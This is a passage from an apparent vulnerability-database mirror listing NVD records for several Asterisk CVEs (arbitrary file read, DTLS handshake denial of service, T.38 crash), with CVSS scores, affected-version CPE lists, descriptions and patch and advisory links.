"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 4.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-14T20:15:52.260",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"source": "security-advisories@github.com",
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/asterisk/asterisk/commit/a1ca0268254374b515fa5992f01340f7717113fa"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2023-49294
Vulnerability from fkie_nvd - Published: 2023-12-14 20:15 - Updated: 2024-11-21 08:33
Severity ?
4.9 (Medium) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
"versionEndExcluding": "18.20.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
"versionEndExcluding": "20.5.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
},
{
"lang": "es",
"value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anterior a las versiones 18.20.1, 20.5.1 y 21.0.1, as\u00ed como en Certified-Asterisco anterior a 18.9-cert6, es posible leer cualquier archivo arbitrario incluso cuando `live_dangerfully` no est\u00e1 habilitado. Esto permite leer archivos arbitrarios. Las versiones de Asterisk 18.20.1, 20.5.1 y 21.0.1, as\u00ed como el asterisco certificado anterior a 18.9-cert6, contienen una soluci\u00f3n para este problema."
}
],
"id": "CVE-2023-49294",
"lastModified": "2024-11-21T08:33:12.447",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-14T20:15:52.730",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"source": "security-advisories@github.com",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"source": "security-advisories@github.com",
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#L3757"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2023-49786
Vulnerability from fkie_nvd - Published: 2023-12-14 20:15 - Updated: 2024-11-21 08:33
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
5.9 (Medium) - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A49E9157-3440-47C5-B730-B1F3BE7240C9",
"versionEndExcluding": "18.20.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA06EB6-E31A-43B2-A750-186255114B8F",
"versionEndExcluding": "20.5.1",
"versionStartIncluding": "19.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:digium:asterisk:21.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D3E690E3-3E92-42ED-87DD-1C6B838A3FF9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:*:*:*:*:*:*:*",
"matchCriteriaId": "2AFE2011-05AA-45A6-A561-65C6C664DA7B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "C1117AA4-CE6B-479B-9995-A9F71C430663",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc1:*:*:*:*:*:*",
"matchCriteriaId": "775041BD-5C86-42B6-8B34-E1D5171B3D87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc2:*:*:*:*:*:*",
"matchCriteriaId": "55EC2877-2FF5-4777-B118-E764A94BCE56",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc3:*:*:*:*:*:*",
"matchCriteriaId": "EB0392C9-A5E9-4D71-8B8D-63FB96E055A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert1-rc4:*:*:*:*:*:*",
"matchCriteriaId": "09AF962D-D4BB-40BA-B435-A59E4402931C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "559D1063-7F37-44F8-B5C6-94758B675FDF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "185B2B4B-B246-4379-906B-9BDA7CDD4400",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "73D3592D-3CE5-4462-9FE8-4BCB54E74B5B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:13.13.0:rc2:*:*:*:*:*:*",
"matchCriteriaId": "B3CCE9E0-5DC4-43A2-96DB-9ABEA60EC157",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"matchCriteriaId": "1EAD713A-CBA2-40C3-9DE3-5366827F18C7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "A5F5A8B7-29C9-403C-9561-7B3E96F9FCA8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert10:*:*:*:*:*:*",
"matchCriteriaId": "F9B96A53-2263-463C-9CCA-0F29865FE500",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert11:*:*:*:*:*:*",
"matchCriteriaId": "A53049F1-8551-453E-834A-68826A7AA959",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert12:*:*:*:*:*:*",
"matchCriteriaId": "B224A4E9-4B6B-4187-B0D6-E4BAE2637960",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "9501DBFF-516D-4F26-BBF6-1B453EE2A630",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "9D3E9AC0-C0B4-4E87-8D48-2B688D28B678",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"matchCriteriaId": "1A8628F6-F8D1-4C0C-BD89-8E2EEF19A5F9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"matchCriteriaId": "E27A6FD1-9321-4C9E-B32B-D6330CD3DC92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert6:*:*:*:*:*:*",
"matchCriteriaId": "B6BF5EDB-9D17-453D-A22E-FDDC4DCDD85B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert7:*:*:*:*:*:*",
"matchCriteriaId": "4C75A21E-5D05-434B-93DE-8DAC4DD3E587",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert8:*:*:*:*:*:*",
"matchCriteriaId": "1D725758-C9F5-4DB2-8C45-CC052518D3FD",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:16.8.0:cert9:*:*:*:*:*:*",
"matchCriteriaId": "B5E2AECC-B681-4EA5-9DE5-2086BB37A5F4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert1:*:*:*:*:*:*",
"matchCriteriaId": "79EEB5E5-B79E-454B-8DCD-3272BA337A9E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert2:*:*:*:*:*:*",
"matchCriteriaId": "892BAE5D-A64E-4FE0-9A99-8C07F342A042",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert3:*:*:*:*:*:*",
"matchCriteriaId": "1A716A45-7075-4CA6-9EF5-2DD088248A5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert4:*:*:*:*:*:*",
"matchCriteriaId": "80EFA05B-E22D-49CE-BDD6-5C7123F1C12B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sangoma:certified_asterisk:18.9:cert5:*:*:*:*:*:*",
"matchCriteriaId": "20FD475F-2B46-47C9-B535-1561E29CB7A1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
},
{
"lang": "es",
"value": "Asterisk es un conjunto de herramientas de telefon\u00eda y centralita privada de c\u00f3digo abierto. En Asterisk anteriores a las versiones 18.20.1, 20.5.1 y 21.0.1; as\u00ed como certificado-asterisco anterior a 18.9-cert6; Asterisk es susceptible a un DoS debido a una condici\u00f3n de ejecuci\u00f3n en la fase \"hello handshake\" del protocolo DTLS cuando maneja DTLS-SRTP para la configuraci\u00f3n de medios. Este ataque se puede realizar de forma continua, negando as\u00ed nuevas llamadas cifradas DTLS-SRTP durante el ataque. El abuso de esta vulnerabilidad puede provocar una denegaci\u00f3n de servicio masiva en servidores Asterisk vulnerables para llamadas que dependen de DTLS-SRTP. El commit d7d7764cb07c8a1872804321302ef93bf62cba05 contiene una soluci\u00f3n, que forma parte de las versiones 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6."
}
],
"id": "CVE-2023-49786",
"lastModified": "2024-11-21T08:33:50.533",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-14T20:15:52.927",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"source": "security-advisories@github.com",
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/176251/Asterisk-20.1.0-Denial-Of-Service.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2023/Dec/24"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/15/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-703"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-362"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2021-46837
Vulnerability from fkie_nvd - Published: 2022-08-30 07:15 - Updated: 2024-11-21 06:34
Severity ?
Summary
res_pjsip_t38 in Sangoma Asterisk 16.x before 16.16.2, 17.x before 17.9.3, and 18.x before 18.2.2, and Certified Asterisk before 16.8-cert7, allows an attacker to trigger a crash by sending an m=image line and zero port in a response to a T.38 re-invite initiated by Asterisk. This is a re-occurrence of the CVE-2019-15297 symptoms but not for exactly the same reason. The crash occurs because there is an append operation relative to the active topology, but this should instead be a replace operation.
References
| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://downloads.asterisk.org/pub/security/AST-2021-006.html | Vendor Advisory | |
| cve@mitre.org | https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html | Mailing List, Third Party Advisory | |
| cve@mitre.org | https://www.debian.org/security/2022/dsa-5285 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://downloads.asterisk.org/pub/security/AST-2021-006.html | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.debian.org/security/2022/dsa-5285 | Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| asterisk | certified_asterisk | 16.8.0 | |
| asterisk | certified_asterisk | 16.8.0 | |
| asterisk | certified_asterisk | 16.8.0 | |
| asterisk | certified_asterisk | 16.8.0 | |
| asterisk | certified_asterisk | 16.8.0 | |
| asterisk | certified_asterisk | 16.8.0 | |
| asterisk | certified_asterisk | 16.8.0 | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| digium | asterisk | * | |
| debian | debian_linux | 9.0 | |
| debian | debian_linux | 10.0 | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:-:*:*:*:*:*:*",
"matchCriteriaId": "335EF1B5-AD89-48E2-AB2C-BF376BC36F77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert1:*:*:*:*:*:*",
"matchCriteriaId": "E64BCD44-2298-4710-9CC3-DF82E6A8DF94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert2:*:*:*:*:*:*",
"matchCriteriaId": "A35C117A-6EFB-42EB-AD2A-EA7866606927",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert3:*:*:*:*:*:*",
"matchCriteriaId": "40003CBE-792F-4875-9E60-6F1CE0BBAA8E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert4:*:*:*:*:*:*",
"matchCriteriaId": "46A7AA7B-13F2-496A-99ED-1CC13234E8CB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:asterisk:certified_asterisk:16.8.0:cert5:*:*:*:*:*:*",
"matchCriteriaId": "147663CB-B48D-4D89-96BF-F92FF96F347F",
"vulnerable": true
},
{
